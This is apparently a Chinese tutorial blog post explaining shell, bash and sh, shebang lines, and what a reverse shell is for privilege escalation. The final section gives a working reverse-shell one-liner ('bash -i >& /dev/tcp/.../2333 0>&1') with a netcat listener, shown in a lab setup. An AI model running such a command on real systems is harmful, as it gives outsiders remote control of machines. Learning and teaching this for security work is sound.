天天看点

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

文章目录

  • 前言
  • 一.shell
  • 二.bash
  • 三.sh
  • 四.不同shell脚本的执行
  • 五. 什么是反弹shell

前言

在进行渗透时,经常会出现一些名词,比如shell,bash,\bin\bash等,为什么在提权时需要他们。

一.shell

什么是Shell?

shell是用户和Linux(或者更准确的说,是用户和Linux内核)之间的接口程序。你在提示符下输入的每个命令都由shell先解释然后传给Linux内核。

shell 是一个命令语言解释器(command-language interpreter)。
拥有自己内建的 shell 命令集。
此外,shell也能被系统中其他有效的Linux 实用程序和应用程序(utilities and application programs)所调用。
           

不论何时你键入一个命令,它都被Linux shell所解释。一些命令,比如打印当前工作目录命令(pwd),是包含在Linux bash内部的(就象DOS的内部命令)。其他命令,比如拷贝命令(cp)和移动命令(rm),是存在于文件系统中某个目录下的单独的程序。而对用户来说,你不知道(或者可能不关心)一个命令是建立在shell内部还是一个单独的程序。

shell 首先检查命令是否是内部命令,不是的话再检查是否是一个应用程序,这里的应用程序可以是Linux本身的实用程序,比如ls rm,
然后shell试着在搜索路径($PATH)里寻找这些应用程序。搜索路径是一个能找到可执行程序的目录列表。
如果你键入的命令不是一个内部命令并且在路径里没有找到这个可执行文件,将会显示一条错误信息。
而如果命令被成功的找到的话,shell的内部命令或应用程序将被分解为系统调用并传给Linux内核。
           

二.bash

Bash是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令。Bash还能从文件中读取命令,这样的文件称为脚本。和其他Unix shell 一样,它支持文件名替换(通配符匹配)、管道、here文档、命令替换、变量,以及条件判断和循环遍历的结构控制语句。包括关键字、语法在内的基本特性全部是从sh借鉴过来的。其他特性,例如历史命令,是从csh和ksh借鉴而来。总的来说,Bash虽然是一个满足POSIX规范的shell,但有很多扩展。

为什么要用 bash 来代替 sh 呢?Bourne shell 最大的缺点在于它处理用户的输入方面。
在 Bourne shell 里键入命令会很麻烦,尤其当你键入很多相似的命令时。
而 bash 准备了几种特性使命令的输入变得更容易。 
           
bash 命令概要
这是几个最有用的bash内部命令:
alias: 设置bash别名。
bg: 使一个被挂起的进程在后台继续执行。
cd: 改变当前工作目录。
exit: 终止shell。
export: 使变量的值对当前shell的所有子进程都可见 。
fc: 用来编辑历史命令列表里的命令。
fg: 使一个被挂起的进程在前台继续执行。
help: 显示bash内部命令的帮助信息。
kill: 终止某个进程。
pwd: 显示当前工作目录。
unalias: 删除已定义的别名。
           

bash (GNU Bourne-Again Shell) 是许多Linux发行版的默认Shell 。事实上,还有许多传统UNIX上用的Shell,例如tcsh、csh、ash、bsh、ksh等等,Shell Script大致都类同。

由于历史原因,UNIX系统上有很多种Shell:

csh(C Shell):由Bill Joy开发,随BSD UNIX发布,它的流程控制语句很像C语言,支持很多Bourne Shell所不支持的功能:作业控制,命令历史,命令行编辑。

ksh(Korn Shell):由David Korn开发,向后兼容sh的功能,并且添加了csh引入的新功能,是目前很多UNIX系统标准配置的Shell,在这些系统上/bin/sh往往是指向/bin/ksh的符号链接。

tcsh(TENEX C Shell):是csh的增强版本,引入了命令补全等功能,在FreeBSD、Mac OS X等系统上替代了csh。

bash(Bourne Again Shell):由GNU开发的Shell,主要目标是与POSIX标准保持一致,同时兼顾对sh的兼容,bash从csh和ksh借鉴了很多功能,是各种Linux发行版标准配置的Shell,在Linux系统上/bin/sh往往是指向/bin/bash的符号链接。

可使用cat /etc/shells 指令查看自己系统可以使用的shell种类:

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

所以/bin/(shell类型)就表示哪种shell

用户的默认Shell设置在/etc/passwd文件中,例如: vim /etc/passwd

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

三.sh

在shell脚本的开头往往有一句话来定义使用哪种sh解释器来解释脚本。

目前常见的shell脚本中主要有以下两种方式:

(1) #!/bin/sh

(2) #!/bin/bash

注意:每个脚本开头都使用"#!",#!实际上是一个2字节魔法数字,这是指定一个文件类型的特殊标记,在这种情况下,指的就是一个可执行的脚本。在#!之后,接一个路径名,这个路径名指定了一个解释脚本命令的程序,这个程序可以是shell,程序语言或者任意一个通用程序。

sh是bash的一种特殊的模式,也就是 /bin/sh 相当于 /bin/bash --posix。说白了sh就是开启了POSIX标准的bash 。

在一般的linux系统当中(如redhat),使用sh调用执行脚本相当于打开了bash的POSIX标准模式

sh一般设成bash的软链:

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

四.不同shell脚本的执行

#!/bin/bash是指此脚本使用/bin/bash来解释执行。

其中,#!是一个特殊的表示符,其后,跟着解释此脚本的shell路径。

bash只是shell的一种,还有很多其它shell,如:sh,csh,ksh,tcsh,…

我们可以通过以下一个示例来进行实验,了解#!/bin/bash的使用。

除第一行外,脚本中所有以“#”开头的行都是注释。

1)#!/bin/bash只能放在第一行,如果后面还有#!,那么只能看成是注释。

这里有三个脚本(脚本都要使用”chmod +x scriptname“命令来获得可执行权限):

tbash1.sh:

#!/bin/sh

source abc

echo “hello abc”

tbash2.sh:

#!/bin/bash

source abc

echo “hello abc”

tbash3.sh:

source abc

echo “hello abc”

三个脚本执行的结果:

[[email protected] other]$ ./tbash1.sh

./tbash1.sh: line 2: abc: No such file or directory

注:当source命令执行有问题时,sh不再往下面执行。

[[email protected] other]$ ./tbash2.sh

./tbash2.sh: line 2: abc: No such file or directory

hello abc

注:当source命令执行有问题时,bash继续执行下面命令。

[[email protected] other]$ ./tbash3.sh

./tbash3.sh: line 1: abc: No such file or directory

hello abc

注:自身登录系统所在的shell是bash。所以,当source命令执行有问题时,bash继续执行下面命令。

五. 什么是反弹shell

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell:

通常用于被控端因防火墙受限、权限不足、端口被占用等情形

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。那么什么情况下正向连接不太好用了呢?

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2.它的ip会动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。

那么反弹就很好理解了, 攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

总结:/bin/sh /bin/bash 就是表示这个shell的本身,其他脚本命令就是使用/bin/bash等shell来执行的。

反弹shell的实例:

受害者:

Ubuntu Linux ------> 192.168.146.128

攻击者:

Kali Linux ------> 192.168.146.129

我们就以最常见的bash为例:

attacker机器上执行:

nc -lvp 2333
           

victim 机器上执行:

bash -i >& /dev/tcp/192.168.146.129/2333 0>&1
           

在攻击者的机器上会出现:

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

释一下这条命令具体的含义:

1.bash -i

1)bash 是linux 的一个比较常见的shell,其实linux的shell还有很多,比如 sh、zsh、等,他们之间有着细小差别

2)-i 这个参数表示的是产生交互式的shell

2./dev/tcp/ip/port

/dev/tcp|udp/ip/port 这个文件是特别特殊的,实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的,如下图:

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

但是如果你在一方监听端口的情况下对这个文件进行读写,就能实现与监听端口的服务器的socket通信

实例1:

我们输出字符串到这个文件里

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

攻击者机器上的输出:

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

实例2:

攻击机上的输入

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

受害者机器上的输出:

在提权时常用的术语解释前言一.shell二.bash三.sh四.不同shell脚本的执行五. 什么是反弹shell

在反弹shell时,一般会反弹的shell为/bin/bash(linux)。

总而言之,shell是操作主机的接口,反弹shell就是把shell送给别人,让其它人可以操作自己的计算机。

文章参考:

https://blog.csdn.net/u014470361/article/details/88049410

先知社区:Linux 反弹shell(二)反弹shell的本质

https://xz.aliyun.com/t/2549